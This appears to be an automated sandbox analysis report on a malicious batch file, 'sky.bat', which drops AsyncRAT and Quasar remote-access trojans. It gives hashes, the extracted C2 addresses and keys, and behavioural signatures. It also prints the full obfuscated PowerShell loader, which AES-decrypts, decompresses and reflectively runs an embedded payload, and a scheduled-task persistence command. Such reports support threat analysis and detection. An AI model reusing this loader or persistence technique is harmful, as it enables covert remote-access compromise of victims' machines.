Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system -
submitted
12/01/2023, 16:32
Static task
static1
Behavioral task
behavioral1
Sample
sky.bat
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
sky.bat
Resource
win10-20220901-en
General
-
Target
sky.bat
-
Size
49KB
-
MD5
4300caa42bd8fc0c7d9ce83b19c6f1f6
-
SHA1
ed8eedc542e02a8ab749b02f161d39bb840a589c
-
SHA256
d329a265d4005b2cb8902d6148ff5e4477f2203bc2e476e51e5895f9be99c53e
-
SHA512
0ebcd250ff95b3bd8058e4bc69640afec65cf91a2745e71303edc48e6066ffa44a589bc2bd060eb54a0c9bc189169757f9a0ec292a6200090e1422db5f64ed30
-
SSDEEP
1536:WBqEwgF4HVzac6F8F2xqWa8VfXx0da57eezlV4R:1/gF41GLNxfa8VPuda57egQ
Malware Config
Extracted
asyncrat
0.5.7B
Default
154.12.250.38:6606
154.12.250.38:7707
154.12.250.38:8808
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
quasar
1.4.0
Office04
154.12.250.38:4782
41264372-ec70-4ccc-bf22-851572e94d2a
-
encryption_key
2D1A3994D3C8E5C6071E7048589030F3E389DDC7
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/3964-220-0x000001A4726F0000-0x000001A472778000-memory.dmp family_quasar -
Async RAT payload 2 IoCs
resource yara_rule behavioral2/memory/4604-141-0x00000112AD050000-0x00000112AD062000-memory.dmp asyncrat behavioral2/memory/4604-171-0x00000112AE440000-0x00000112AE462000-memory.dmp asyncrat -
Executes dropped EXE 2 IoCs
pid Process 4604 sky.bat.exe 3964 mbwito.bat.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 api.ipify.org 13 api.ipify.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4740 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4604 sky.bat.exe 4604 sky.bat.exe 4604 sky.bat.exe 4904 powershell.exe 4904 powershell.exe 4904 powershell.exe 3964 mbwito.bat.exe 3964 mbwito.bat.exe 3964 mbwito.bat.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4604 sky.bat.exe Token: SeDebugPrivilege 4904 powershell.exe Token: SeDebugPrivilege 3964 mbwito.bat.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3964 mbwito.bat.exe 3964 mbwito.bat.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 3964 mbwito.bat.exe 3964 mbwito.bat.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3964 mbwito.bat.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1928 wrote to memory of 4604 1928 cmd.exe 67 PID 1928 wrote to memory of 4604 1928 cmd.exe 67 PID 4604 wrote to memory of 800 4604 sky.bat.exe 69 PID 4604 wrote to memory of 800 4604 sky.bat.exe 69 PID 800 wrote to memory of 4904 800 cmd.exe 71 PID 800 wrote to memory of 4904 800 cmd.exe 71 PID 4904 wrote to memory of 3164 4904 powershell.exe 72 PID 4904 wrote to memory of 3164 4904 powershell.exe 72 PID 3164 wrote to memory of 3964 3164 cmd.exe 74 PID 3164 wrote to memory of 3964 3164 cmd.exe 74 PID 3964 wrote to memory of 4740 3964 mbwito.bat.exe 75 PID 3964 wrote to memory of 4740 3964 mbwito.bat.exe 75
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Users\Admin\AppData\Local\Temp\sky.bat.exe"sky.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sky.bat').Split([Environment]::NewLine);foreach ($YiLGW in $eIfqq) { if ($YiLGW.StartsWith(':: ')) { $VuGcO = $YiLGW.Substring(3); break; }; };$uZOcm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VuGcO);$BacUA = New-Object System.Security.Cryptography.AesManaged;$BacUA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BacUA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CeRsc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=');$BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn/J717js1MwdbbqMn7Lw==');$Nlgap = $BacUA.CreateDecryptor();$uZOcm = $Nlgap.TransformFinalBlock($uZOcm, 0, $uZOcm.Length);$Nlgap.Dispose();$BacUA.Dispose();$mNKMr = New-Object System.IO.MemoryStream(, $uZOcm);$bTMLk = New-Object System.IO.MemoryStream;$NVPbn = New-Object System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress);$NVPbn.CopyTo($bTMLk);$NVPbn.Dispose();$mNKMr.Dispose();$bTMLk.Dispose();$uZOcm = $bTMLk.ToArray();$gDBNO = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uZOcm);$PtfdQ = $gDBNO.EntryPoint;$PtfdQ.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbwito.bat"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbwito.bat"'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mbwito.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe"mbwito.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $aObMV = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\mbwito.bat').Split([Environment]::NewLine);foreach ($HMeAa in $aObMV) { if ($HMeAa.StartsWith(':: ')) { $jAtOW = $HMeAa.Substring(3); break; }; };$ZFFIb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jAtOW);$ufQIZ = New-Object System.Security.Cryptography.AesManaged;$ufQIZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ufQIZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ufQIZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xOjIEV/9x6H2AllyLs+AVd39m7l0oQelRu64WlIJr2c=');$ufQIZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TIb2elsPL654mr15kjK1tw==');$iHrgg = $ufQIZ.CreateDecryptor();$ZFFIb = $iHrgg.TransformFinalBlock($ZFFIb, 0, $ZFFIb.Length);$iHrgg.Dispose();$ufQIZ.Dispose();$rCpxm = New-Object System.IO.MemoryStream(, $ZFFIb);$ZoKsk = New-Object System.IO.MemoryStream;$EUWbj = New-Object System.IO.Compression.GZipStream($rCpxm, [IO.Compression.CompressionMode]::Decompress);$EUWbj.CopyTo($ZoKsk);$EUWbj.Dispose();$rCpxm.Dispose();$ZoKsk.Dispose();$ZFFIb = $ZoKsk.ToArray();$ARNYR = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ZFFIb);$BjviT = $ARNYR.EntryPoint;$BjviT.Invoke($null, (, [string[]] ('')))6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
PID:4740
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD56128469adf6a46e1fde5c24182bcbece
SHA1b1056fc0c08aa1c70dd2c4b4aaeb6ddd7661d981
SHA256d8f5a2e911a00db37c73ad0251651a5a72cdc5455f5ae8ca2ea275d3351fc61c
SHA512efec3e82e4c59657c2540c6c77ca5e4170fbea30d239df7d15b8f0459aba0b3ce5df3cc25ae321585f5f32e4ecc0a2f2fccbc831521598e892c5bb37ae0e8500
-
Filesize
325KB
MD52f84982ec56d82645ac61de4fb3e6e50
SHA192817fc3db66755ad189049f8e4ad3dbbaaa6db1
SHA25656aa2d6eee7f10040da74bb29c3bbe1e555547249ac4fc21e53e7d6182941e9c
SHA5122a9802c6eb9eb263b7388e6659cd424592bc151e392330ac9fb3ebf96dc1e4127db124bd412c85480247089e9db972966c735b9e049680d6200b97581135c3cd
-
Filesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
-
Filesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
-
Filesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
-
Filesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4